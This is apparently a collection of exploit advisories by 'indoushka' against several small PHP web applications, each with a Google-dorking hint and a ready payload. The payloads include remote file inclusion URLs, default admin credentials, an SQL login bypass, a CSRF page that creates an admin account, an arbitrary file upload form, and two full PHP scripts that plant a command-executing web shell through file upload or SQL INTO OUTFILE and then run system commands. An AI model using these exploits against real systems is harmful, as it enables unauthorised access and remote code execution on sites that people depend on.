<pre><code>=============================================================================================================================================<br />| # Title : Online Survey System 1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /index.php?page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg<br /><br />[+] http://127.0.0.1/survey/index.php?page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Online Birth Certificate System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/obcs/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Medical Card Generations System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/medical-card-generation-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/mcgs/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Part 01 : about-us.php<br /><br />[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php . <br /> <br />[+] Line 2 : Make sure to include your database connection here<br /><br />[+] Line 44 : Send the form data using fetch API (Set your target url)<br /><br />[+] save payload as poc.php in your localhost path .<br /><br />[+] payload : <br /><br /><?php<br />include('http://127.0.0.1/eahp/admin/includes/dbconnection.php'); // Make sure to include your database connection here<br /><br />if (isset($_POST['submit'])) {<br /> $pagetitle = $_POST['pagetitle'];<br /> $pagedes = $con->real_escape_string($_POST['pagedes']);<br /> $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");<br /><br /> if ($query) {<br /> echo '<script>alert("About Us has been updated.")</script>';<br /> } else {<br /> echo '<script>alert("Something Went Wrong. Please try again.")</script>';<br /> }<br /> exit;<br />}<br />?><br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>indoushka | Update About Us Content</title><br /> <!-- NicEdit Script --><br /> <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script><br /> <script type="text/javascript"><br /> // Apply NicEdit to all text areas when the DOM is loaded<br /> bkLib.onDomLoaded(nicEditors.allTextAreas);<br /><br /> // Function to handle form submission using JavaScript<br /> function submitForm(event) {<br /> event.preventDefault(); // Prevent default form submission<br /><br /> const pagetitle = document.getElementById('pagetitle').value;<br /> const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content<br /><br /> // Prepare the form data to be sent<br /> const formData = new FormData();<br /> formData.append('pagetitle', pagetitle);<br /> formData.append('pagedes', pagedes);<br /> formData.append('submit', true);<br /><br /> // Send the form data using fetch API<br /> fetch('http://127.0.0.1/eahp/admin/about-us.php', {<br /> method: 'POST',<br /> body: formData,<br /> })<br /> .then(response => response.text())<br /> .then(data => {<br /> alert('About Us content has been updated successfully.');<br /> console.log(data); // Handle the response from the server<br /> })<br /> .catch(error => {<br /> console.error('Error:', error);<br /> });<br /> }<br /> </script><br /> <style><br /> /* Center the form container */<br /> .editor-container {<br /> max-width: 800px;<br /> margin: 0 auto; /* Center horizontally */<br /> padding: 20px;<br /> text-align: center; /* Center the content inside */<br /> }<br /><br /> /* Ensure the textarea takes the full width */<br /> #pagedes {<br /> width: 100%;<br /> height: 300px;<br /> margin: 0 auto;<br /> }<br /> </style><br /></head><br /><body><br /> <div id="app"><br /> <div class="app-content"><br /> <div class="main-content"><br /> <div class="wrap-content container" id="container"><br /> <!-- Page Title Section --><br /> <section id="page-title"><br /> <div class="row"><br /> <div class="col-sm-8"><br /> <h1 class="mainTitle">Update the About Us Content</h1><br /> </div><br /> <br /> </li><br /> </ol><br /> </div><br /> </section><br /> <!-- Form Section --><br /> <div class="container-fluid container-fullw bg-white"><br /> <div class="row"><br /> <div class="col-md-12"><br /> <!-- Centering the form using a wrapper div --><br /> <div class="editor-container"><br /> <form class="forms-sample" method="post" onsubmit="submitForm(event);"><br /> <div class="form-group"><br /> <label for="pagetitle">Page Title</label><br /> <input id="pagetitle" name="pagetitle" type="text" class="form-control" required><br /> </div><br /> <div class="form-group"><br /> <label for="pagedes">Page Description</label><br /> <!-- NicEdit will enhance this textarea --><br /> <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea><br /> </div><br /> <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button><br /> </form><br /> </div><br /> </div><br /> </div><br /> </div><br /> <!-- End Form Section --><br /> </div><br /> </div><br /> </div><br /> </div><br /> <!-- Footer --><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : printable staff id card creator system 1.0 idor Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.campcodes.com/downloads/printable-staff-id-card-creator-system-source-code/?wpdmdl=6749&refresh=66bbc00367bf91723580419 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure direct object reference: Suffering from an insecure direct object reference that allows users to upload and execute remote files. .<br /><br />[+] Line : 8 Set your Target<br /><br />[+] Save As poc.html<br /><br />[+] payload :<br /><br /><br /><<div class="modal-content" style="font-size: 14px; font-family: Times New Roman;color:black;"><br /> <div class="modal-header" style="background:#222d32"><br /> <button type="button" class="close" data-dismiss="modal">×</button><br /> <h4 class="modal-title" style="font-weight: bold;color: #F0F0F0"><center><br /> SYSTEM INFORMATION INITIALISATION<br /> </center></h4><br /> </div><br /> <form method="post" action="http://127.0.0.1/Staff_registration/upload.php" enctype="multipart/form-data"> <br /><br /> <div class="modal-body"> <br /> <center> <br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp;&nbsp;Org Name:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgname"></span></p><br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;Phone:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgphone"></span></p><br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Email:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgemail"></span></p><br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp;Website:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgwebsite"></span></p><br /> <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">Active Year:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgyear"></span></p><br /> Attach Organisation Logo:(<h7 style="color:red">Make sure it is a transparent image</h7>)<input name="filed" type="file" id="filed"><br /> <input type="hidden" name="page" value="admin.php"> <br /> </center><br /> </div><br /> <div class="modal-footer"><br /> <input type="submit" class="btn btn-success" value="Finish" id="addmember" name="orginitial"> &nbsp;<br /> <button type="button" class="btn btn-success" data-dismiss="modal">Close</button><br /> </div><br /> </form></div><br /> <br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Prison Management System v1.0 Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/PHP-pms.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page is designed to create a file and inject PHP code.<br /><br />[+] save payload as poc.html <br /><br />[+] line 6,Set your target.<br /><br />[+] payload : <br /><br /><!DOCTYPE html> <br /><html> <br /><body><br /> <script> function submitRequest() <br /> { var xhr = new XMLHttpRequest(); <br /> xhr.open("POST", "http:\/\/127.0.0.1\/pms\/classes\/Users.php?f=save", true); <br /> xhr.setRequestHeader("Accept", "*\/*"); <br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");<br /> xhr.withCredentials = true; <br /> var body =<br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"username\"\r\n" + <br /> "\r\n" + <br /> "indoushka\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"password\"\r\n" + <br /> "\r\n" + <br /> "Hacked\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"type\"\r\n" + <br /> "\r\n" + <br /> "1\r\n" + <br /> "-------------------------------\r\n"; <br /> var aBody = new Uint8Array(body.length); <br /> for (var i = 0; i < aBody.length; i++) <br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody])); <br /> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form> <br /> </body> <br /> </html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Survey System 1.0 File inclusion Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /survey/index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg<br /><br />[+] http://127.0.0.1/survey/index.php?page=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Student Grading System 1.0 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.campcodes.com/projects/php/online-student-grading-system/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user&pass : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/Student_Grading_System/<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Marriage Registration System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload inject php code contains a back door.<br /><br />[+] Line 16 + 19 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php -u http://127.0.0.1/omrs/ -c dir<br /><br />[+] payload :<br /><br /><?php<br />// Parse command line arguments<br />$options = getopt("u:c:m:p:");<br />$url = $options['u'] ?? null;<br />$command = $options['c'] ?? null;<br />$mobile = $options['m'] ?? null;<br />$password = $options['p'] ?? 'inouvis2022';<br /><br />if (!$url || !$command) {<br /> die("Usage: php script.php -u <url> -c <command> \n");<br />}<br /><br />function login($url, $mobile, $password) {<br /> $loginUrl = "{$url}/user/login.php";<br /><br /> $ch = curl_init($loginUrl);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([<br /> 'mobno' => $mobile,<br /> 'password' => $password,<br /> 'login' => ''<br /> ]));<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_setopt($ch, CURLOPT_HEADER, true);<br /> curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');<br /> curl_exec($ch);<br /> curl_close($ch);<br /><br /> // Extract PHPSESSID from cookie file<br /> $cookies = file_get_contents('cookie.txt');<br /> preg_match('/PHPSESSID=(\w+);/', $cookies, $matches);<br /> return $matches[1] ?? null;<br />}<br /><br />function upload($url, $cookie) {<br /> $uploadUrl = "{$url}/user/marriage-reg-form.php";<br /><br /> $fileData = [<br /> 'husimage' => curl_file_create('shell.php', 'application/x-php', '<?php $command = shell_exec($_REQUEST["cmd"]); echo $command; ?>'),<br /> 'wifeimage' => curl_file_create('test.jpg', 'image/jpeg')<br /> ];<br /><br /> $ch = curl_init($uploadUrl);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $fileData);<br /> curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_exec($ch);<br /> curl_close($ch);<br /><br /> echo "[+] PHP shell uploaded\n";<br />}<br /><br />function getRemotePhpFiles($url) {<br /> $filesUrl = "{$url}/";<br /> $ch = curl_init($filesUrl);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> $response = curl_exec($ch);<br /> curl_close($ch);<br /><br /> preg_match_all('/\d{10,42}\.php/', $response, $matches);<br /> return $matches[0];<br />}<br /><br />function execCommand($url, $webshell, $command) {<br /> $commandUrl = "{$url}/user/{$webshell}?cmd=" . urlencode($command);<br /> $ch = curl_init($commandUrl);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> $output = curl_exec($ch);<br /> curl_close($ch);<br /><br /> echo "[+] Command output\n" . $output . "\n";<br />}<br /><br />function register($mobile, $password, $url) {<br /> $signupUrl = "{$url}/user/signup.php";<br /><br /> $ch = curl_init($signupUrl);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([<br /> 'fname' => 'indoushka',<br /> 'lname' => 'indoushka',<br /> 'mobno' => $mobile,<br /> 'address' => 'indoushka',<br /> 'password' => $password,<br /> 'submit' => ''<br /> ]));<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_exec($ch);<br /> curl_close($ch);<br /><br /> echo "[+] Registered with mobile phone $mobile and password '$password'\n";<br />}<br /><br />$mobile = $mobile ?? strval(rand(100000000, 999999999));<br />$password = $password ?? 'inouvis-2022';<br /><br />if ($password === 'inouvis-2022' || $mobile === null) {<br /> register($mobile, $password, $url);<br />}<br /><br />$cookie = login($url, $mobile, $password);<br />$initialPhpFiles = getRemotePhpFiles($url);<br />upload($url, $cookie);<br />$finalPhpFiles = getRemotePhpFiles($url);<br />$webshell = array_diff($finalPhpFiles, $initialPhpFiles)[0];<br />execCommand($url, $webshell, $command);<br />?><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Dairy Farm Shop Management System 1.2 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2019/12/Dairy-Farm-Shop-Management-System-Project.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload inject php code contains a back door.<br /><br />[+] Line 16 + 19 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><?php<br />// المكتبات المطلوبة<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// تحديد URL ثابت<br />$url = 'http://localhost/dfsms/';<br /><br />// مسار ثابت لرفع الملف<br />$path = 'C:\www\dfsms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// حمولة الباب الخلفي<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// إرسال ملف PHP يحتوي على الباب الخلفي<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request($url . "/index.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>